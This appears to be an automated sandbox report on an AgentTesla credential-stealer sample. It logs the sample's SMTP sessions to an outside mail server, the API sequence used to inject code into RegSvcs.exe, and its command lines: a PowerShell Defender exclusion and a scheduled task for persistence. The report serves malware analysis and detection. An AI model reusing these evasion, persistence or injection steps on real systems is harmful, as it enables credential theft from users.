                                                          Nov 21, 2024 09:05:58.190062046 CET5875000677.88.21.158192.168.2.6250-mail-nwsmtp-smtp-production-main-45.sas.yp-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 53477376
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:05:58.190253973 CET50006587192.168.2.677.88.21.158STARTTLS
                                                          Nov 21, 2024 09:05:58.649436951 CET5875000677.88.21.158192.168.2.6220 Go ahead
                                                          Nov 21, 2024 09:06:05.785904884 CET5875000777.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-canary-88.sas.yp-c.yandex.net Ok 1732176365-56O56L1Oo0U0
                                                          Nov 21, 2024 09:06:05.788331985 CET50007587192.168.2.677.88.21.158EHLO 367706
                                                          Nov 21, 2024 09:06:06.236552000 CET5875000777.88.21.158192.168.2.6250-mail-nwsmtp-smtp-production-canary-88.sas.yp-c.yandex.net
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-SIZE 53477376
                                                          250-STARTTLS
                                                          250-AUTH LOGIN PLAIN XOAUTH2
                                                          250-DSN
                                                          250 ENHANCEDSTATUSCODES
                                                          Nov 21, 2024 09:06:06.257749081 CET50007587192.168.2.677.88.21.158STARTTLS
                                                          Nov 21, 2024 09:06:06.706059933 CET5875000777.88.21.158192.168.2.6220 Go ahead
                                                          Nov 21, 2024 09:06:12.938718081 CET5875000877.88.21.158192.168.2.6220 mail-nwsmtp-smtp-production-main-33.iva.yp-c.yandex.net Ok 1732176372-C6O6fq0OouQ0

                                                          Target ID:0
                                                          Start time:03:02:01
                                                          Start date:21/11/2024
                                                          Path:C:\Users\user\Desktop\datasheet.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\datasheet.exe"
                                                          Imagebase:0x770000
                                                          File size:651'776 bytes
                                                          MD5 hash:4C7E7BD9EAF56B3936BE87A6904F70F8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:03:02:02
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe"
                                                          Imagebase:0xa90000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:03:02:02
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:03:02:02
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe"
                                                          Imagebase:0xa90000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:03:02:02
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:03:02:03
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp"
                                                          Imagebase:0x100000
                                                          File size:187'904 bytes
                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:03:02:03
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:03:02:03
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                          Imagebase:0xdd0000
                                                          File size:45'984 bytes
                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2218212331.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2218212331.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2218212331.00000000031EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:03:02:05
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                          Imagebase:0x7ff717f30000
                                                          File size:496'640 bytes
                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                          Has elevated privileges:true
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:03:02:05
                                                          Start date:21/11/2024
                                                          Path:C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe
                                                          Imagebase:0x8f0000
                                                          File size:651'776 bytes
                                                          MD5 hash:4C7E7BD9EAF56B3936BE87A6904F70F8
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 55%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:03:02:08
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmpA381.tmp"
                                                          Imagebase:0x100000
                                                          File size:187'904 bytes
                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:03:02:08
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff66e660000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:03:02:08
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                          Imagebase:0x160000
                                                          File size:45'984 bytes
                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:03:02:08
                                                          Start date:21/11/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                          Imagebase:0x9b0000
                                                          File size:45'984 bytes
                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Has exited:false

                                                            Execution Graph

                                                            Execution Coverage:11%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:3.5%
                                                            Total number of Nodes:228
                                                            Total number of Limit Nodes:14
                                                             Execution graph (rendered graph omitted); caller -> API edges recovered from the graph data:
                                                             • 2b3d3c0: GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId
                                                             • 7c00f98 -> 7c01210 / 7c01218: PostMessageW
                                                             • 724d0dc and 724d1ef -> 724cfce -> 724faf8 / 724fae9 -> 724fb12, which dispatches to the 7c00xxx helpers below
                                                             • 7c00040, 7c00007, 7c00b11 -> 724cbb6 / 724cbb8: CreateProcessA
                                                             • 7c002c6 -> 7c00dc8 / 7c00dd8 -> 724c870 / 724c868: VirtualAllocEx, then 724c930 / 724c928: WriteProcessMemory
                                                             • 7c001f7, 7c00192, 7c0080d -> 724c930 / 724c928: WriteProcessMemory
                                                             • 7c002d1 -> 724c930 / 724c928: WriteProcessMemory, then 724c790 / 724c798: Wow64SetThreadContext
                                                             • 7c00170, 7c00348, 7c005e2 -> 724c790 / 724c798: Wow64SetThreadContext
                                                             • 7c003f4 -> 724ca20 / 724ca1a: ReadProcessMemory
                                                             • 7c00796, 7c00311, 7c0028d, 7c00721, 7c004a0 -> 724be71 / 724be78: ResumeThread
                                                             • 2b34668 -> 2b34778 -> 2b34879 / 2b34888 -> 2b344c4: CreateActCtxA
                                                             • 2b34668 -> 2b33e40 -> 2b35e4c -> 2b370a4 -> 2b370d4 -> 2b3b001 -> 2b3b027 / 2b3b038 -> 2b3b130 -> 2b3b368: GetModuleHandleW
                                                             • 2b370d4 -> 2b3d0e8 -> 2b3d297 / 2b3d2a8 -> 2b3ce10 -> 2b3cf3c -> 2b370d4: GetModuleHandleW
                                                             • 2b3d608: DuplicateHandle
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193299094.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7c00000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ebb3fa80cd66379855105cb84fb71d8a9f31452214449e686573b6864bc1d403
                                                            • Instruction ID: de8047ab9fa36541fbb3ae700f160882f12a990d5d67ebf07494b083fc68e530
                                                            • Opcode Fuzzy Hash: ebb3fa80cd66379855105cb84fb71d8a9f31452214449e686573b6864bc1d403
                                                            • Instruction Fuzzy Hash: F9E19EB17016058FDB26DB75C4A4BAEB7F7AF89300F2484A9D1869B6D0CB35D901CBD1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193299094.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7c00000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7ae2a3697f9656220e39cf64e1ea070b12d813a70306ae91a062726fb50834d3
                                                            • Instruction ID: 0c6ad86c26f34601b4f4c40fd26543203ba51ab56235ba87bbbac1694432a64b
                                                            • Opcode Fuzzy Hash: 7ae2a3697f9656220e39cf64e1ea070b12d813a70306ae91a062726fb50834d3
                                                            • Instruction Fuzzy Hash: E8710AB1D44629CBDB68CF66C8447E9F7B6BF89300F14D1AAD40DA6290EB705AC5CF80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193299094.0000000007C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7c00000_datasheet.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f29ba0e028c5b9776402e5b8415fbffafe6a830017b70cbd52c0513ce288907
                                                            • Instruction ID: 608881d22bb279c152713e5f5c75effc1d96086ab23889d1fa49e555f57cf6bd
                                                            • Opcode Fuzzy Hash: 4f29ba0e028c5b9776402e5b8415fbffafe6a830017b70cbd52c0513ce288907
                                                            • Instruction Fuzzy Hash: FBF0A0B4D9D108CFC7108B41E8842F8BBB8EB4B315F0670E2C90E93293DB3456868BD1

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 02B3D43E
                                                            • GetCurrentThread.KERNEL32 ref: 02B3D47B
                                                            • GetCurrentProcess.KERNEL32 ref: 02B3D4B8
                                                            • GetCurrentThreadId.KERNEL32 ref: 02B3D511
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: d46a1174ce104f55d5dc2adb117d80af5bee4486da022ed21d166fe5d29d5592
                                                            • Instruction ID: 499d0558541254a2888f9932710fc3322a57613fd3dc3d773aa98c76d4fd14c7
                                                            • Opcode Fuzzy Hash: d46a1174ce104f55d5dc2adb117d80af5bee4486da022ed21d166fe5d29d5592
                                                            • Instruction Fuzzy Hash: 335177B1A0134ACFDB04CFAAD548B9EBBF1EF88318F248599E108A7350DB746945CF61

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 02B3D43E
                                                            • GetCurrentThread.KERNEL32 ref: 02B3D47B
                                                            • GetCurrentProcess.KERNEL32 ref: 02B3D4B8
                                                            • GetCurrentThreadId.KERNEL32 ref: 02B3D511
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: e836222ce40b55aa77ce36a1929fff7721dca0a2aa5282a8e317bc2ee24faf24
                                                            • Instruction ID: d782a8e180b4ca75a7d231d0bf90495e837f1269f40a9b8b3706da23442bee56
                                                            • Opcode Fuzzy Hash: e836222ce40b55aa77ce36a1929fff7721dca0a2aa5282a8e317bc2ee24faf24
                                                            • Instruction Fuzzy Hash: 095177B190034ACFDB04DFAAD548B9EBBF1EF88318F248599E009A7350DB74A944CF65

                                                            Control-flow Graph

                                                             • Control-flow graph (rendered graph omitted): function 2b3b130, basic blocks 2b3b130-2b3b3b0; internal calls 2b3aaf4, 2b3b3bb / 2b3b3c8, 2b3ab00, 2b3ab10, 2b3ab20, 2b3ab30; API call GetModuleHandleW in block 2b3b368-2b3b393
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02B3B386
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID: 0O$0O
                                                            • API String ID: 4139908857-234839962
                                                            • Opcode ID: 23eb2946ea65f86c2db221ed610cf72f4890787c76ebdd8eea81d2917853dd8a
                                                            • Instruction ID: fa23a616b4ceea0dc6084d896837db6dbed5a47106d1e45126e0d09c2bcd2360
                                                            • Opcode Fuzzy Hash: 23eb2946ea65f86c2db221ed610cf72f4890787c76ebdd8eea81d2917853dd8a
                                                            • Instruction Fuzzy Hash: A2714470A00B058FD725DF6AD44475ABBF1FF88308F108A6ED48AD7A44DB74E845CB91

                                                            Control-flow Graph

                                                             • Control-flow graph (rendered graph omitted): function 724cbb6, basic blocks 724cbb6-724cefd; API call CreateProcessA in block 724cd47-724ce01
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0724CDEE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 89b3996386b9feacb46755ef4c2d3750857e2b6249898437e825ecbe52c38338
                                                            • Instruction ID: 821455fc7e3bf9185123f67134d4dd6f17c969c89a3a86cfce770a7edb9df623
                                                            • Opcode Fuzzy Hash: 89b3996386b9feacb46755ef4c2d3750857e2b6249898437e825ecbe52c38338
                                                            • Instruction Fuzzy Hash: 08917DB1D1125ADFEF24CF68C8417EEBBB6BF48310F148569E809A7240DB749985CFA1

                                                            Control-flow Graph

                                                             • Control-flow graph (rendered graph omitted): function 724cbb8, basic blocks 724cbb8-724cefd; API call CreateProcessA in block 724cd47-724ce01
                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0724CDEE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 6577e1cfaf0a01cdfd9a73ddafc144cff5173c8264c50e5ad2a53c254ef179a7
                                                            • Instruction ID: 90a89a7617c38f37d8f178e67a73d1ffe790796cd601928eb6ddb91c02c0cbfb
                                                            • Opcode Fuzzy Hash: 6577e1cfaf0a01cdfd9a73ddafc144cff5173c8264c50e5ad2a53c254ef179a7
                                                            • Instruction Fuzzy Hash: 78917DB1D1125ADFEF24CF68C8407EEBBB6BF48310F148569E809A7240DB749985CFA1

                                                            Control-flow Graph

                                                             • Control-flow graph (rendered graph omitted): function 2b3590d, basic blocks 2b3590d-2b35b14; API call CreateActCtxA in block 2b35918-2b359d9
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 02B359C9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: aa1cec53c380faa59a33b49d4a8b417865ca01029bb28ede7ee3c1a72a321a79
                                                            • Instruction ID: d1d2748677abb27a9c1d964f4c3ffda0cc0d17fa3f2d3b11c9d092d5eb888b7f
                                                            • Opcode Fuzzy Hash: aa1cec53c380faa59a33b49d4a8b417865ca01029bb28ede7ee3c1a72a321a79
                                                            • Instruction Fuzzy Hash: 724104B0C0071DCBEB25CFA9C884B9EBBF5BF89304F60816AD508AB251DB756946CF50

                                                            Control-flow Graph

                                                             • Control-flow graph (rendered graph omitted): function 2b344c4, basic blocks 2b344c4-2b35b14; API call CreateActCtxA in block 2b344c4-2b359d9
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 02B359C9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 4c8bfb9699e7c2656421e7befa07651f885c710b97016cf6f5ad296ce10302c9
                                                            • Instruction ID: e483feb3d54cab4db37be5169ebfb693acd86573b50f36656e854dd8aa92945b
                                                            • Opcode Fuzzy Hash: 4c8bfb9699e7c2656421e7befa07651f885c710b97016cf6f5ad296ce10302c9
                                                            • Instruction Fuzzy Hash: 5941E2B0C0071DCBEB25CFA9C98479EBBF5BF48304F6081AAD508AB251DB756945CF90

                                                            Control-flow Graph

                                                             • Control-flow graph (rendered graph omitted): function 724c928, basic blocks 724c928-724ca06; API call WriteProcessMemory in block 724c98e-724c9cd
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0724C9C0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 5a4dbc78c480bd434d35c2f9b2fc998310dad25275f2aa335f64da6c493f9187
                                                            • Instruction ID: a396895bf8398f0c5f2228347fcf65c6412db5be92ee8d8718a10581de3d16c7
                                                            • Opcode Fuzzy Hash: 5a4dbc78c480bd434d35c2f9b2fc998310dad25275f2aa335f64da6c493f9187
                                                            • Instruction Fuzzy Hash: C6214BB690030A9FDF10CFA9C881BEEBBF5FF48320F10842AE559A7240D7799554CBA4

                                                            Control-flow Graph

                                                             • Control-flow graph (rendered graph omitted): function 724c930, basic blocks 724c930-724ca06; API call WriteProcessMemory in block 724c98e-724c9cd
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0724C9C0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 7811aa5e3c89191ab2ad043dd2d50bb469ca6dc0050360f24efc5390e08090cc
                                                            • Instruction ID: 9d531ab03c507c8ff09f043fd2fc7d9c8dd7cd195776eea3a9a922c0407db380
                                                            • Opcode Fuzzy Hash: 7811aa5e3c89191ab2ad043dd2d50bb469ca6dc0050360f24efc5390e08090cc
                                                            • Instruction Fuzzy Hash: 492126B190134A9FDB14CFA9C881BEEBBF5FF48310F10842AE958A7240D7799950CBA4

                                                            Control-flow Graph
                                                            • Blocks: 409 (724ca1a-724caad, calls ReadProcessMemory), 413 (724cab6-724cae6), 414 (724caaf-724cab5)
                                                            • Edges: 409->413, 409->414, 414->413
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0724CAA0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: ea16932332af7adfff43da595615772b86028fa8e454944700433f17288744fa
                                                            • Instruction ID: cc56b556875c0e4a145b0b635992c1d611c5a9258dcd040c00fa651be8d11386
                                                            • Opcode Fuzzy Hash: ea16932332af7adfff43da595615772b86028fa8e454944700433f17288744fa
                                                            • Instruction Fuzzy Hash: 902119B290135A9FDB14CFAAC841BEEBBF5FF48320F10842AE558A7240D7799550CBA5

                                                            Control-flow Graph
                                                            • Blocks: 418 (2b3d600-2b3d606), 419 (2b3d608-2b3d69c, calls DuplicateHandle), 420 (2b3d6a5-2b3d6c2), 421 (2b3d69e-2b3d6a4)
                                                            • Edges: 418->419, 419->420, 419->421, 421->420
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02B3D68F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2186042993.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2b30000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 70a6f2e7b31e416b2a2f1b636927524ad35d839d324f719addda2ea2750d07ea
                                                            • Instruction ID: ca0ad37a386217caf72dbf860456a606f383736715c5ae288f4fe9a5177d154d
                                                            • Opcode Fuzzy Hash: 70a6f2e7b31e416b2a2f1b636927524ad35d839d324f719addda2ea2750d07ea
                                                            • Instruction Fuzzy Hash: 6121E6B59002099FDB10CFAAD584ADEBBF4FB48320F14845AE918A7310D379A954CFA4

                                                            Control-flow Graph
                                                            • Blocks: 424 (724c790-724c7e3), 426 (724c7e5-724c7f1), 427 (724c7f3-724c823, calls Wow64SetThreadContext), 429 (724c825-724c82b), 430 (724c82c-724c85c)
                                                            • Edges: 424->426, 424->427, 426->427, 427->429, 427->430, 429->430
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0724C816
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2193016632.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7240000_datasheet.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: b68adf433c1c301422e1c64befee69de00c320e2e2bd68f7efa4ae1c35486a25
                                                            • Instruction ID: 51f645bced8c178698033843ed30fa02a73964f540130a011a9904dd6a93f508
                                                            • Opcode Fuzzy Hash: b68adf433c1c301422e1c64befee69de00c320e2e2bd68f7efa4ae1c35486a25
                                                            • Instruction Fuzzy Hash: 372159B190030A9FDB10CFAAC4857EEBBF4EF88320F14842AD519A7240D7799945CFA1

                                                            Control-flow Graph
